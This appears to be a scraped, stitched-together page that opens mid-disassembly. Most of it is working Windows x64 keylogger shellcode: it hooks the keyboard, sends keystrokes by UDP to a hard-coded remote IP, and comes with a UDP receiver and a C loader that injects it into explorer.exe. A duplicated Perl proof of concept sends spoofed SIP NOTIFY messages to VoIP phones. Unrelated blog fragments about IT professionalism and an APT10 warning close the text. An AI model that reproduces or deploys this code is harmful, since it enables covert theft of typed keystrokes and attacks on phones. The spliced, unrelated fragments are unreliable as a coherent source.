24f: 75 f6 jne 247
251: 48 ff c2 inc rdx
254: 51 push rcx
255: 48 ff c9 dec rcx
258: 48 87 f7 xchg rdi,rsi
25b: f3 a6 repz cmps BYTE PTR ds:[rsi],BYTE PTR es:[rdi]
25d: 59 pop rcx
25e: 75 d3 jne 233
260: 48 ff ca dec rdx
263: 48 8b 7c 24 08 mov rdi,QWORD PTR [rsp+0x8]
268: 48 01 cf add rdi,rcx
26b: 48 89 7c 24 08 mov QWORD PTR [rsp+0x8],rdi
270: 48 31 db xor rbx,rbx
273: 53 push rbx
274: 58 pop rax
275: 66 41 8b 1c 51 mov bx,WORD PTR [r9+rdx*2]
27a: 41 8b 04 9a mov eax,DWORD PTR [r10+rbx*4]
27e: 4c 01 d8 add rax,r11
281: 48 8b 1c 24 mov rbx,QWORD PTR [rsp]
285: 48 89 03 mov QWORD PTR [rbx],rax
288: 48 83 c3 08 add rbx,0x8
28c: 48 89 1c 24 mov QWORD PTR [rsp],rbx
290: 48 8b 5c 24 10 mov rbx,QWORD PTR [rsp+0x10]
295: 48 ff cb dec rbx
298: 48 89 5c 24 10 mov QWORD PTR [rsp+0x10],rbx
29d: 48 31 d2 xor rdx,rdx
2a0: 48 39 d3 cmp rbx,rdx
2a3: 75 8e jne 233
2a5: 48 83 c4 18 add rsp,0x18
2a9: 5f pop rdi
2aa: 5e pop rsi
2ab: c3 ret
00000000000002ac <_proceed_>:
2ac: 48 83 ec 58 sub rsp,0x58
2b0: 41 50 push r8
2b2: 52 push rdx
2b3: 51 push rcx
2b4: 48 31 f6 xor rsi,rsi
2b7: 48 b8 48 45 52 45 49 movabs rax,0x5349544945524548
2be: 54 49 53
00000000000002c1
2c1: 4c 8b 14 34 mov r10,QWORD PTR [rsp+rsi*1]
2c5: 48 ff c6 inc rsi
2c8: 49 39 c2 cmp r10,rax
2cb: 75 f4 jne 2c1
2cd: 48 83 c6 07 add rsi,0x7
2d1: 48 8d 1c 34 lea rbx,[rsp+rsi*1]
2d5: 48 8b 3b mov rdi,QWORD PTR [rbx]
2d8: 4c 8b 63 08 mov r12,QWORD PTR [rbx+0x8]
2dc: 4c 8b 7b 10 mov r15,QWORD PTR [rbx+0x10]
2e0: 48 85 c9 test rcx,rcx
2e3: 75 68 jne 34d <_out_>
2e5: 48 31 db xor rbx,rbx
2e8: b3 01 mov bl,0x1
2ea: 48 c1 e3 08 shl rbx,0x8
2ee: 48 39 da cmp rdx,rbx
2f1: 75 5a jne 34d <_out_>
2f3: 48 8b 5f 20 mov rbx,QWORD PTR [rdi+0x20]
2f7: 48 31 c9 xor rcx,rcx
2fa: b1 14 mov cl,0x14
2fc: ff d3 call rbx
2fe: 66 41 89 04 24 mov WORD PTR [r12],ax
303: 48 8b 5f 20 mov rbx,QWORD PTR [rdi+0x20]
307: 48 31 c9 xor rcx,rcx
30a: b1 10 mov cl,0x10
30c: ff d3 call rbx
30e: 66 41 89 44 24 02 mov WORD PTR [r12+0x2],ax
314: 48 8b 5c 24 10 mov rbx,QWORD PTR [rsp+0x10]
319: 8b 03 mov eax,DWORD PTR [rbx]
31b: 41 89 44 24 04 mov DWORD PTR [r12+0x4],eax
320: 48 83 ec 58 sub rsp,0x58
324: 48 8b 4f 08 mov rcx,QWORD PTR [rdi+0x8]
328: 41 54 push r12
32a: 5a pop rdx
32b: 4d 31 c9 xor r9,r9
32e: 41 51 push r9
330: 41 58 pop r8
332: 41 b0 10 mov r8b,0x10
335: 4c 89 7c 24 20 mov QWORD PTR [rsp+0x20],r15
33a: 4c 89 44 24 28 mov QWORD PTR [rsp+0x28],r8
33f: 49 83 e8 08 sub r8,0x8
343: 48 8b 5f 50 mov rbx,QWORD PTR [rdi+0x50]
347: ff d3 call rbx
349: 48 83 c4 58 add rsp,0x58
000000000000034d <_out_>:
34d: 5a pop rdx
34e: 41 58 pop r8
350: 41 59 pop r9
352: 48 8b 5f 18 mov rbx,QWORD PTR [rdi+0x18]
356: 48 31 c9 xor rcx,rcx
359: ff d3 call rbx
35b: 48 83 c4 58 add rsp,0x58
35f: c3 ret
*/
/*
section .text
global _start
_start:
jmp short p1
_init_:
xor rdx,rdx
mov rax,[gs:rdx+0x60] ; getting pointer of PEB structure
mov rax,[rax+24] ;rax=PPEB->Ldr
mov rax,[rax+32] ;Ldr->InMemoryOrderModuleList
mov rsi,[rax]
mov rax,[rsi]
mov rsi,[rax+32] ;kernel32.dll base address
pop rbx ;address of _p2_
push rbx
ret; transferring execution control to _p2_
p1:
call _init_
;-----------------------------------------------------------------------------------------------------
_p2_:
push rdx
push rdx
lea r15,[rsp]
sub rsp,56
lea r12,[rsp] ; pointer important data (2 short int + 1 DWORD + 48 byte MSG structure )
sub rsp,88
lea rdi,[rsp] ; pointer to function address
push r15
push r12
push rdi
mov rax,'HEREITIS'
push rax
xor rax,rax
mov ax,get_addr-_p2_
add rbx,rax ; address of get_addr
push rbx ;reserving future use
mov rcx,rsi
lea rdx,[rbx-(get_addr-kernel32_func)]
xor r8,r8
mov r8b,2
mov r9,rdi
call rbx ;loading kernel32_func functions
;-------------------------------------------------------------------------------------
pop r13 ;address of get_addr
;loading ws2_32.dll
xor rax,rax
push rax
push rax
mov rax,'ws2_32.d'
mov [rsp],rax
mov [rsp+8],word 'll'
lea rcx,[rsp]
mov rsi,[rdi+8]
sub rsp,40
call rsi
xchg rsi,rax
;----------------------------------------------------------
;loading user32.dll
lea rcx,[rsp+40]
mov [rcx],dword 'user'
call rax
;====================================
;loading user32.dll functions
mov rcx,rax
lea rdx,[r13-(get_addr-user32_func)]
xor r8,r8
mov r8b,6
lea r9,[rdi+16] ;user32.dll functions from 16
call r13
;===================================
;loading ws2_32.dll functions
mov rcx,rsi
lea rdx,[r13-(get_addr-ws2_32_func)]
xor r8,r8
mov r8b,3
lea r9,[rdi+64] ;ws2_32.dll functions from 64
call r13
add rsp,56
;===========================================All necessary functions are loaded. Time to proceed to main task ========================================
_p3_:
xor rcx,rcx
mov cx,408
sub rsp,rcx
add rcx,106
lea rdx,[rsp]
mov rbx,[rdi+64] ;WSAStartup()
call rbx
xor rcx,rcx
mov cl,2
push rcx
push rcx
pop rdx
pop r8
mov r8b,17
mov rbx,[rdi+72] ;socket()
call rbx
mov [rdi+8],rax ;SOCKET
mov rbx,[rdi] ; GetModuleHandleA()
xor rcx,rcx
call rbx
;------------------------------------
mov [r15],byte 2
mov [r15+2],word 0x83db ;port change it
mov [r15+4],dword 0x63c1a1c1 ;IP change it
;-----------------------------------
xor r9,r9
push r9
push r9
pop rcx
pop rdx
mov cl,13
mov r8,rax
mov dl,_proceed_-get_addr
add rdx,r13
mov rbx,[rdi+16] ;SetWindowsHookExA()
call rbx
_p4_:
lea rcx,[r12+8]
xor rdx,rdx
push rdx
push rdx
pop r8
pop r9
mov rbx,[rdi+40] ;GetMessageA()
call rbx
lea rcx,[r12+8]
mov rbx,[rdi+48] ;TranslateMessage()
call rbx
lea rcx,[r12+8]
mov rbx,[rdi+56] ;DispatchMessageA()
call rbx
jmp short _p4_
;----------------------------------------------------------------------------------------
kernel32_func:
db 'GetModuleHandleA',1,'LoadLibraryA',1
user32_func:
db 'SetWindowsHookExA',1,'CallNextHookEx',1,'GetKeyState',1,'GetMessageA',1,'TranslateMessage',1,'DispatchMessageA',1
ws2_32_func:
db 'WSAStartup',1,'socket',1,'sendto',1
get_addr: ; rcx=dll base , rdx=function name string address , r8=number of functions , r9=address of buffer
db 0x56,0x57,0x41,0x50,0x52,0x41,0x51,0x51,0x41,0x5b,0x48,0x31,0xdb,0x53,0x53,0x5a,0x58,0x8b,0x59,0x3c,0x48,0x01,0xcb,0xb2,0x88,0x8b,0x04,0x13,0x48,0x01,0xc8,0x48,0x31,0xd2,0x52,0x52,0x52,0x41,0x58,0x41,0x59,0x41,0x5a,0x44,0x8b,0x40,0x20,0x4d,0x01,0xd8,0x44,0x8b,0x48,0x24,0x4d,0x01,0xd9,0x44,0x8b,0x50,0x1c,0x4d,0x01,0xda,0x48,0x31,0xd2,0x48,0x31,0xf6,0x56,0x59,0x41,0x8b,0x34,0x90,0x4c,0x01,0xde,0x48,0x8b,0x7c,0x24,0x08,0x48,0x31,0xc0,0x8a,0x04,0x0f,0x48,0xff,0xc1,0x3c,0x01,0x75,0xf6,0x48,0xff,0xc2,0x51,0x48,0xff,0xc9,0x48,0x87,0xf7,0xf3,0xa6,0x59,0x75,0xd3,0x48,0xff,0xca,0x48,0x8b,0x7c,0x24,0x08,0x48,0x01,0xcf,0x48,0x89,0x7c,0x24,0x08,0x48,0x31,0xdb,0x53,0x58,0x66,0x41,0x8b,0x1c,0x51,0x41,0x8b,0x04,0x9a,0x4c,0x01,0xd8,0x48,0x8b,0x1c,0x24,0x48,0x89,0x03,0x48,0x83,0xc3,0x08,0x48,0x89,0x1c,0x24,0x48,0x8b,0x5c,0x24,0x10,0x48,0xff,0xcb,0x48,0x89,0x5c,0x24,0x10,0x48,0x31,0xd2,0x48,0x39,0xd3,0x75,0x8e,0x48,0x83,0xc4,0x18,0x5f,0x5e,0xc3
;-------------------------------------------------------------------------------------------------------------------
_proceed_:
sub rsp,88
push r8
push rdx
push rcx
;---------------------------------------------
xor rsi,rsi
mov rax,'HEREITIS'
find:
mov r10,[rsp+rsi]
inc rsi
cmp r10,rax
jne find
add rsi,7
lea rbx,[rsp+rsi]
mov rdi,[rbx]
mov r12,[rbx+8]
mov r15,[rbx+16]
;------------------------------------------------
test rcx,rcx
jnz short _out_
xor rbx,rbx
mov bl,1
shl rbx,8
cmp rdx,rbx
jne short _out_
;--------------------------------------------------------
mov rbx,[rdi+32] ;GetKeyState(VK_CAPITAL)
xor rcx,rcx
mov cl,0x14
call rbx
mov [r12],ax
mov rbx,[rdi+32] ;GetKeyState(VK_SHIFT)
xor rcx,rcx
mov cl,0x10
call rbx
mov [r12+2],ax
;-------------------------------
;sending keystrokes
mov rbx,[rsp+16]
mov eax,[rbx]
mov [r12+4],eax ;Virtual key code
sub rsp,88
mov rcx,[rdi+8] ;SOCKET
push r12
pop rdx
xor r9,r9
push r9
pop r8
mov r8b,16
mov [rsp+32],r15
mov [rsp+40],r8
sub r8,8
mov rbx,[rdi+80]
call rbx
add rsp,88
;-----------------------------------------------------------
_out_:
pop rdx
pop r8
pop r9
mov rbx,[rdi+24]
xor rcx,rcx
call rbx
add rsp,88
ret
*/
/*
//keylogger Handler
#include
#include
#include
#pragma pack(1)
typedef struct key
{
short caps;
short shift;
DWORD vkcode;
}KEYDATA;
char * Determine(BOOL caps,BOOL shift,DWORD code)
{
char * key;
switch (code) // SWITCH ON INT
{
case 0x41: key = caps ? (shift ? "a" : "A") : (shift ? "A" : "a"); break;
case 0x42: key = caps ? (shift ? "b" : "B") : (shift ? "B" : "b"); break;
case 0x43: key = caps ? (shift ? "c" : "C") : (shift ? "C" : "c"); break;
case 0x44: key = caps ? (shift ? "d" : "D") : (shift ? "D" : "d"); break;
case 0x45: key = caps ? (shift ? "e" : "E") : (shift ? "E" : "e"); break;
case 0x46: key = caps ? (shift ? "f" : "F") : (shift ? "F" : "f"); break;
case 0x47: key = caps ? (shift ? "g" : "G") : (shift ? "G" : "g"); break;
case 0x48: key = caps ? (shift ? "h" : "H") : (shift ? "H" : "h"); break;
case 0x49: key = caps ? (shift ? "i" : "I") : (shift ? "I" : "i"); break;
case 0x4A: key = caps ? (shift ? "j" : "J") : (shift ? "J" : "j"); break;
case 0x4B: key = caps ? (shift ? "k" : "K") : (shift ? "K" : "k"); break;
case 0x4C: key = caps ? (shift ? "l" : "L") : (shift ? "L" : "l"); break;
case 0x4D: key = caps ? (shift ? "m" : "M") : (shift ? "M" : "m"); break;
case 0x4E: key = caps ? (shift ? "n" : "N") : (shift ? "N" : "n"); break;
case 0x4F: key = caps ? (shift ? "o" : "O") : (shift ? "O" : "o"); break;
case 0x50: key = caps ? (shift ? "p" : "P") : (shift ? "P" : "p"); break;
case 0x51: key = caps ? (shift ? "q" : "Q") : (shift ? "Q" : "q"); break;
case 0x52: key = caps ? (shift ? "r" : "R") : (shift ? "R" : "r"); break;
case 0x53: key = caps ? (shift ? "s" : "S") : (shift ? "S" : "s"); break;
case 0x54: key = caps ? (shift ? "t" : "T") : (shift ? "T" : "t"); break;
case 0x55: key = caps ? (shift ? "u" : "U") : (shift ? "U" : "u"); break;
case 0x56: key = caps ? (shift ? "v" : "V") : (shift ? "V" : "v"); break;
case 0x57: key = caps ? (shift ? "w" : "W") : (shift ? "W" : "w"); break;
case 0x58: key = caps ? (shift ? "x" : "X") : (shift ? "X" : "x"); break;
case 0x59: key = caps ? (shift ? "y" : "Y") : (shift ? "Y" : "y"); break;
case 0x5A: key = caps ? (shift ? "z" : "Z") : (shift ? "Z" : "z"); break;
// Sleep Key
case VK_SLEEP: key = "[SLEEP]"; break;
// Num Keyboard
case VK_NUMPAD0: key = "0"; break;
case VK_NUMPAD1: key = "1"; break;
case VK_NUMPAD2 : key = "2"; break;
case VK_NUMPAD3: key = "3"; break;
case VK_NUMPAD4: key = "4"; break;
case VK_NUMPAD5: key = "5"; break;
case VK_NUMPAD6: key = "6"; break;
case VK_NUMPAD7: key = "7"; break;
case VK_NUMPAD8: key = "8"; break;
case VK_NUMPAD9: key = "9"; break;
case VK_MULTIPLY: key = "*"; break;
case VK_ADD: key = "+"; break;
case VK_SEPARATOR: key = "-"; break;
case VK_SUBTRACT: key = "-"; break;
case VK_DECIMAL: key = "."; break;
case VK_DIVIDE: key = "/"; break;
// Function Keys
case VK_F1: key = "[F1]"; break;
case VK_F2: key = "[F2]"; break;
case VK_F3: key = "[F3]"; break;
case VK_F4: key = "[F4]"; break;
case VK_F5: key = "[F5]"; break;
case VK_F6: key = "[F6]"; break;
case VK_F7: key = "[F7]"; break;
case VK_F8: key = "[F8]"; break;
case VK_F9: key = "[F9]"; break;
case VK_F10: key = "[F10]"; break;
case VK_F11: key = "[F11]"; break;
case VK_F12: key = "[F12]"; break;
case VK_F13: key = "[F13]"; break;
case VK_F14: key = "[F14]"; break;
case VK_F15: key = "[F15]"; break;
case VK_F16: key = "[F16]"; break;
case VK_F17: key = "[F17]"; break;
case VK_F18: key = "[F18]"; break;
case VK_F19: key = "[F19]"; break;
case VK_F20: key = "[F20]"; break;
case VK_F21: key = "[F22]"; break;
case VK_F22: key = "[F23]"; break;
case VK_F23: key = "[F24]"; break;
case VK_F24: key = "[F25]"; break;
// Keys
case VK_NUMLOCK: key = "[NUM-LOCK]"; break;
case VK_SCROLL: key = "[SCROLL-LOCK]"; break;
case VK_BACK: key = "[BACK]"; break;
case VK_TAB: key = "[TAB]"; break;
case VK_CLEAR: key = "[CLEAR]"; break;
case VK_RETURN: key = "[ENTER]"; break;
case VK_SHIFT: key = "[SHIFT]"; break;
case VK_CONTROL: key = "[CTRL]"; break;
case VK_MENU: key = "[ALT]"; break;
case VK_PAUSE: key = "[PAUSE]"; break;
case VK_CAPITAL: key = "[CAP-LOCK]"; break;
case VK_ESCAPE: key = "[ESC]"; break;
case VK_SPACE: key = "[SPACE]"; break;
case VK_PRIOR: key = "[PAGEUP]"; break;
case VK_NEXT: key = "[PAGEDOWN]"; break;
case VK_END: key = "[END]"; break;
case VK_HOME: key = "[HOME]"; break;
case VK_LEFT: key = "[LEFT]"; break;
case VK_UP: key = "[UP]"; break;
case VK_RIGHT: key = "[RIGHT]"; break;
case VK_DOWN: key = "[DOWN]"; break;
case VK_SELECT: key = "[SELECT]"; break;
case VK_PRINT: key = "[PRINT]"; break;
case VK_SNAPSHOT: key = "[PRTSCRN]"; break;
case VK_INSERT: key = "[INS]"; break;
case VK_DELETE: key = "[DEL]"; break;
case VK_HELP: key = "[HELP]"; break;
// Number Keys with shift
case 0x30: key = shift ? ")" : "0"; break;
case 0x31: key = shift ? "!" : "1"; break;
case 0x32: key = shift ? "@" : "2"; break;
case 0x33: key = shift ? "#" : "3"; break;
case 0x34: key = shift ? "$" : "4"; break;
case 0x35: key = shift ? "%" : "5"; break;
case 0x36: key = shift ? "^" : "6"; break;
case 0x37: key = shift ? "&" : "7"; break;
case 0x38: key = shift ? "*" : "8"; break;
case 0x39: key = shift ? "(" : "9"; break;
// Windows Keys
case VK_LWIN: key = "[WIN]"; break;
case VK_RWIN: key = "[WIN]"; break;
case VK_LSHIFT: key = "[SHIFT]"; break;
case VK_RSHIFT: key = "[SHIFT]"; break;
case VK_LCONTROL: key = "[CTRL]"; break;
case VK_RCONTROL: key = "[CTRL]"; break;
// OEM Keys with shift
case VK_OEM_1: key = shift ? ":" : ";"; break;
case VK_OEM_PLUS: key = shift ? "+" : "="; break;
case VK_OEM_COMMA: key = shift ? "<" : ","; break; case VK_OEM_MINUS: key = shift ? "_" : "-"; break; case VK_OEM_PERIOD: key = shift ? ">" : "."; break;
case VK_OEM_2: key = shift ? "?" : "/"; break;
case VK_OEM_3: key = shift ? "~" : "`"; break;
case VK_OEM_4: key = shift ? "{" : "["; break;
case VK_OEM_5: key = shift ? "|" : "\\"; break;
case VK_OEM_6: key = shift ? "}" : "]"; break;
case VK_OEM_7: key = shift ? "\"" : "'"; break; //TODO: Escape this char: "
// Action Keys
case VK_PLAY: key = "[PLAY]";break;
case VK_ZOOM: key = "[ZOOM]";break;
case VK_OEM_CLEAR: key = "[CLEAR]";break;
case VK_CANCEL: key = "[CTRL-C]";break;
default: key = "[UNK-KEY]";break;
}
return key;
}
int main()
{
int port;
SOCKET s;
struct sockaddr_in sr,cr;
WSADATA wsa;
KEYDATA keystrk;
char * n;
printf("Enter Port Number To Listen: ");
scanf("%d",&port);
if(WSAStartup(514,&wsa))
{
printf("WSAStartup() Failed");
return 0;
}
if((s=socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP))==INVALID_SOCKET)
{
printf("Failed To Create Socket...");
return 0;
}
ZeroMemory(&sr,16);
sr.sin_family=AF_INET;
sr.sin_port=htons(port);
if(bind(s,(struct sockaddr *)&sr,16))
{
printf("Failed To Bind..");
return 0;
}
port=16; //Why bother to declare a variable for int * fromlen
while(1)
{
recvfrom(s,(char *)&keystrk,8,0,(struct sockaddr *)&cr,&port);
n=Determine(keystrk.caps&0x0001,keystrk.shift>>15,keystrk.vkcode);
printf("%s",n);
}
return 0;
}
*/
#include
#include
#include
#include
char shellcode[]="\xeb\x1d\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x40\x18\x48\x8b\x40\x20\x48\x8b\x30\x48\x8b\x06\x48\x8b\x70\x20\x5b\x53\xc3\xe8\xde\xff\xff\xff\x52\x52\x4c\x8d\x3c\x24\x48\x83\xec\x38\x4c\x8d\x24\x24\x48\x83\xec\x58\x48\x8d\x3c\x24\x41\x57\x41\x54\x57\x48\xb8\x48\x45\x52\x45\x49\x54\x49\x53\x50\x48\x31\xc0\x66\xb8\xcc\x01\x48\x01\xc3\x53\x48\x89\xf1\x48\x8d\x93\x6e\xff\xff\xff\x4d\x31\xc0\x41\xb0\x02\x49\x89\xf9\xff\xd3\x41\x5d\x48\x31\xc0\x50\x50\x48\xb8\x77\x73\x32\x5f\x33\x32\x2e\x64\x48\x89\x04\x24\x66\xc7\x44\x24\x08\x6c\x6c\x48\x8d\x0c\x24\x48\x8b\x77\x08\x48\x83\xec\x28\xff\xd6\x48\x96\x48\x8d\x4c\x24\x28\xc7\x01\x75\x73\x65\x72\xff\xd0\x48\x89\xc1\x49\x8d\x55\x8c\x4d\x31\xc0\x41\xb0\x06\x4c\x8d\x4f\x10\x41\xff\xd5\x48\x89\xf1\x49\x8d\x55\xe7\x4d\x31\xc0\x41\xb0\x03\x4c\x8d\x4f\x40\x41\xff\xd5\x48\x83\xc4\x38\x48\x31\xc9\x66\xb9\x98\x01\x48\x29\xcc\x48\x83\xc1\x6a\x48\x8d\x14\x24\x48\x8b\x5f\x40\xff\xd3\x48\x31\xc9\xb1\x02\x51\x51\x5a\x41\x58\x41\xb0\x11\x48\x8b\x5f\x48\xff\xd3\x48\x89\x47\x08\x48\x8b\x1f\x48\x31\xc9\xff\xd3\x41\xc6\x07\x02\x66\x41\xc7\x47\x02\xdb\x83\x41\xc7\x47\x04\xc1\xa1\xc1\x63\x4d\x31\xc9\x41\x51\x41\x51\x59\x5a\xb1\x0d\x49\x89\xc0\xb2\xbc\x4c\x01\xea\x48\x8b\x5f\x10\xff\xd3\x49\x8d\x4c\x24\x08\x48\x31\xd2\x52\x52\x41\x58\x41\x59\x48\x8b\x5f\x28\xff\xd3\x49\x8d\x4c\x24\x08\x48\x8b\x5f\x30\xff\xd3\x49\x8d\x4c\x24\x08\x48\x8b\x5f\x38\xff\xd3\xeb\xd4\x47\x65\x74\x4d\x6f\x64\x75\x6c\x65\x48\x61\x6e\x64\x6c\x65\x41\x01\x4c\x6f\x61\x64\x4c\x69\x62\x72\x61\x72\x79\x41\x01\x53\x65\x74\x57\x69\x6e\x64\x6f\x77\x73\x48\x6f\x6f\x6b\x45\x78\x41\x01\x43\x61\x6c\x6c\x4e\x65\x78\x74\x48\x6f\x6f\x6b\x45\x78\x01\x47\x65\x74\x4b\x65\x79\x53\x74\x61\x74\x65\x01\x47\x65\x74\x4d\x65\x73\x73\x61\x67\x65\x41\x01\x54\x72\x61\x6e\x73\x6c\x61\x74\x65\x4d\x65\x73\x73\x61\x67\x65\x01\x44\x69\x73\x70\x61\x74\x63\x68\x4d\x65\x73\x73\x61\x67\x65\x41\x01\x57\x53\x41\x53\x74\x61\x72\x74\x75\x70\x01\x73\x6f\x63\x6b\x65\x74\x01\x73\x65\x6e\x64\x74\x6f\x01\x56\x57\x41\x50\x52\x41\x51\x51\x41\x5b\x48\x31\xdb\x53\x53\x5a\x58\x8b\x59\x3c\x48\x01\xcb\xb2\x88\x8b\x04\x13\x48\x01\xc8\x48\x31\xd2\x52\x52\x52\x41\x58\x41\x59\x41\x5a\x44\x8b\x40\x20\x4d\x01\xd8\x44\x8b\x48\x24\x4d\x01\xd9\x44\x8b\x50\x1c\x4d\x01\xda\x48\x31\xd2\x48\x31\xf6\x56\x59\x41\x8b\x34\x90\x4c\x01\xde\x48\x8b\x7c\x24\x08\x48\x31\xc0\x8a\x04\x0f\x48\xff\xc1\x3c\x01\x75\xf6\x48\xff\xc2\x51\x48\xff\xc9\x48\x87\xf7\xf3\xa6\x59\x75\xd3\x48\xff\xca\x48\x8b\x7c\x24\x08\x48\x01\xcf\x48\x89\x7c\x24\x08\x48\x31\xdb\x53\x58\x66\x41\x8b\x1c\x51\x41\x8b\x04\x9a\x4c\x01\xd8\x48\x8b\x1c\x24\x48\x89\x03\x48\x83\xc3\x08\x48\x89\x1c\x24\x48\x8b\x5c\x24\x10\x48\xff\xcb\x48\x89\x5c\x24\x10\x48\x31\xd2\x48\x39\xd3\x75\x8e\x48\x83\xc4\x18\x5f\x5e\xc3\x48\x83\xec\x58\x41\x50\x52\x51\x48\x31\xf6\x48\xb8\x48\x45\x52\x45\x49\x54\x49\x53\x4c\x8b\x14\x34\x48\xff\xc6\x49\x39\xc2\x75\xf4\x48\x83\xc6\x07\x48\x8d\x1c\x34\x48\x8b\x3b\x4c\x8b\x63\x08\x4c\x8b\x7b\x10\x48\x85\xc9\x75\x68\x48\x31\xdb\xb3\x01\x48\xc1\xe3\x08\x48\x39\xda\x75\x5a\x48\x8b\x5f\x20\x48\x31\xc9\xb1\x14\xff\xd3\x66\x41\x89\x04\x24\x48\x8b\x5f\x20\x48\x31\xc9\xb1\x10\xff\xd3\x66\x41\x89\x44\x24\x02\x48\x8b\x5c\x24\x10\x8b\x03\x41\x89\x44\x24\x04\x48\x83\xec\x58\x48\x8b\x4f\x08\x41\x54\x5a\x4d\x31\xc9\x41\x51\x41\x58\x41\xb0\x10\x4c\x89\x7c\x24\x20\x4c\x89\x44\x24\x28\x49\x83\xe8\x08\x48\x8b\x5f\x50\xff\xd3\x48\x83\xc4\x58\x5a\x41\x58\x41\x59\x48\x8b\x5f\x18\x48\x31\xc9\xff\xd3\x48\x83\xc4\x58\xc3";
int main()
{
HANDLE s,proc;
PROCESSENTRY32 ps;
BOOL process_found=0;
LPVOID shell;
SIZE_T total;
//finding explorer.exe pid
ps.dwSize=sizeof(ps);
s=CreateToolhelp32Snapshot(2,0);
if(s==INVALID_HANDLE_VALUE)
{
printf("CreateToolhelp32Snapshot() failed.Error code %d\n",GetLastError());
return -1;
}
if(!Process32First(s,&ps))
{
printf("Process32First() failed.Error code %d\n",GetLastError());
return -1;
}
do{
if(0==strcmp(ps.szExeFile,"explorer.exe"))
{
process_found=1;
break;
}
}while(Process32Next(s,&ps));
if(!process_found)
{
printf("Unknown Process\n");
return -1;
}
//opening process using pid
proc=OpenProcess(PROCESS_ALL_ACCESS,0,ps.th32ProcessID);
if(proc==INVALID_HANDLE_VALUE)
{
printf("OpenProcess() failed.Error code %d\n",GetLastError());
return -1;
}
//allocating memory process memory
if( (shell=VirtualAllocEx(proc,NULL,sizeof(shellcode),MEM_COMMIT,PAGE_EXECUTE_READWRITE)) == NULL)
{
printf("Failed to allocate memory into process");
CloseHandle(proc);
return -1;
}
//writing shellcode into process memory
WriteProcessMemory(proc,shell,shellcode,sizeof(shellcode),&total);
if(sizeof(shellcode)!=total)
{
printf("Failed write shellcode into process memory");
CloseHandle(proc);
return -1;
}
//Executing shellcode
if((s=CreateRemoteThread(proc,NULL,0,(LPTHREAD_START_ROUTINE)shell,NULL,0,0))==NULL)
{
printf("Failed to Execute shellcode");
CloseHandle(proc);
return -1;
}
CloseHandle(proc);
CloseHandle(s);
return 0;
}
spoofed SIP status messages / no CVE assigned / origin: 2005-07-06
source: http://www.securityfocus.com/bid/14174/info
Multiple Vendor VoIP Phones handle spoofed SIP status messages in an improper manner. This issue could potentially lead a to a denial of service condition against a server.
The issue arises because the affected phones do not verify the 'Call-ID', 'tag' and 'branch' headers of NOTIFY messages and process spoofed status messages instead of rejecting the messages.
Cisco 7940 and 7960 and Grandstream BT 100 phones are affected by this issue. Other vendors may be vulnerable as well.
#!/usr/bin/perl
# SIP NOTIFY POC by DrFrancky@securax.org
use Socket;
SendSIPTo("10.0.0.1"); # IP of the phone
sub SendSIPTo{
$phone_ip = shift;
$MESG="NOTIFY sip:chaos\@$phone_ip:5060 SIP/2.0
Via: SIP/2.0/UDP 1.2.3.4:5060;branch=000000000000000
From: \"drfrancky\";tag=000000000
To:
Contact:
Event: message-summary
Call-ID: drfrancky\@1.2.3.4
CSeq: 102 NOTIFY
Content-Type: application/simple-message-summary
Content-Length: 37
Messages-Waiting: yes
Voicemail: 3/2";
$proto = getprotobyname('udp');
socket(SOCKET, PF_INET, SOCK_DGRAM, $proto) ;
$iaddr = inet_aton("0.0.0.0");
$paddr = sockaddr_in(5060, $iaddr);
bind(SOCKET, $paddr) ;
$port=5060;
$hisiaddr = inet_aton($phone_ip) ;
$hispaddr = sockaddr_in($port, $hisiaddr);
send(SOCKET, $MESG, 0,$hispaddr ) || warn "send $host $!\n";
}
Multiple Vendor VoIP Phones handle spoofed SIP status messages in an improper manner. This issue could potentially lead a to a denial of service condition against a server.
The issue arises because the affected phones do not verify the 'Call-ID', 'tag' and 'branch' headers of NOTIFY messages and process spoofed status messages instead of rejecting the messages.
Cisco 7940 and 7960 and Grandstream BT 100 phones are affected by this issue. Other vendors may be vulnerable as well.
#!/usr/bin/perl
# SIP NOTIFY POC by DrFrancky@securax.org
use Socket;
SendSIPTo("10.0.0.1"); # IP of the phone
sub SendSIPTo{
$phone_ip = shift;
$MESG="NOTIFY sip:chaos\@$phone_ip:5060 SIP/2.0
Via: SIP/2.0/UDP 1.2.3.4:5060;branch=000000000000000
From: \"drfrancky\"
To:
Contact:
Event: message-summary
Call-ID: drfrancky\@1.2.3.4
CSeq: 102 NOTIFY
Content-Type: application/simple-message-summary
Content-Length: 37
Messages-Waiting: yes
Voicemail: 3/2";
$proto = getprotobyname('udp');
socket(SOCKET, PF_INET, SOCK_DGRAM, $proto) ;
$iaddr = inet_aton("0.0.0.0");
$paddr = sockaddr_in(5060, $iaddr);
bind(SOCKET, $paddr) ;
$port=5060;
$hisiaddr = inet_aton($phone_ip) ;
$hispaddr = sockaddr_in($port, $hisiaddr);
send(SOCKET, $MESG, 0,$hispaddr ) || warn "send $host $!\n";
}
Friday, December 28, 2018
Professions are here for a reason
Thanks to Ivan Pepelnjak for the below one.
And many others as welll!
An unused knob is sometimes better than a used.
Professions are here for a reason – they enable people to do the work they’re qualified to do.Needless to say, it took him decades to fully understand its implications.
Do what you’re qualified to do. Don’t think you’re good as me at everything just because you can Google-and-paste. Figure out where your limitations are.
Seek help when you’re dealing with something beyond your comfort zone. The amount of ignorant improvisation we see in IT is stupefying. Have you ever wondered why lawyers and doctors ask for second opinion?
Yes, I know your manager expects you to know everything just because you have administrator or engineer in your job title, which just proves he never thought about the next two paragraphs.
Don’t think you understand other people’s job. I’m always amazed to watch people completely unqualified to have an opinion on a problem loudly offering it just because they’re experts in totally unrelated field. PhDs in chemistry telling IT engineers how to do their jobs would be one of my first-hand experiences.
Don’t think you could do their jobs better than they do… until you tried and proved you can succeed while facing the same constraints they have. My favorite one: an airline pilot confident he could write a program to do airline’s crew scheduling (which is probably an NP-hard problem) on Commodore-64.
Having said all that, do your job well if you want to earn and retain the trust of your peers. If you’re obviously clueless or randomly throwing fixes at the problem trying to figure out which one might stick don’t be surprised when everyone else starts acting in ways I described above.
Accept help (courtesy of Chris Young). When a grey-beard gives you a piece of advice - LISTEN. Doesn’t mean you have to accept it as truth or obey their commands, but watching people new to the profession make the same mistakes we all made 20 years ago because they didn’t heed the warning is frustrating…
And “I told you so” doesn’t fix the network or the harm that major network outages cause to our reputation as a profession.
APT10 investigation + US Cert Warning
Latest US-CERT from 20th December:
https://www.us-cert.gov/china
Operation Cloud Hopper:
